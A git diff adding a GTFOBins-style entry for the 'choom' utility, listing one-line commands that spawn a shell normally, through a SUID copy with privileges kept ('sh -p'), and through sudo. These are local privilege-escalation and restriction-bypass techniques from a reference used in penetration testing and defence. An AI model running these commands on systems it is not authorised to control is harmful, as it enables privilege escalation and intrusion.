diff --git a/_gtfobins/choom.md b/_gtfobins/choom.md new file mode 100644 index 0000000..b1d460f --- /dev/null +++ b/_gtfobins/choom.md @@ -0,0 +1,9 @@ +--- +functions: + shell: + - code: choom -n 0 /bin/sh + suid: + - code: ./choom -n 0 -- /bin/sh -p + sudo: + - code: sudo choom -n 0 /bin/sh +---